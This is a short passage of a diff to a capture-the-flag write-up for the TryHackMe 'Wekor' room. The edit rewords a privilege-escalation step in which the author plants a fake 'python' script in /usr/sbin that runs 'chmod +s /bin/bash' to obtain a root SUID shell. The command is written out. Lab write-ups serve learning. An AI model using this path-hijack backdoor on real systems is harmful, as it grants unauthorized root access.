siunam321/CTF-Writeups/TryHackMe/Wekor/README.md

 **To exploit this relative path, I'll:**

-- Create a malicious "python" binary that will add SUID sticky bit into `/bin/bash`, and mark it as executable:
+- Create a malicious "python" Bash script that will add SUID sticky bit into `/bin/bash`, and mark it as executable:

 ```
 Orka@osboxes:/usr/sbin$ echo "chmod +s /bin/bash" > python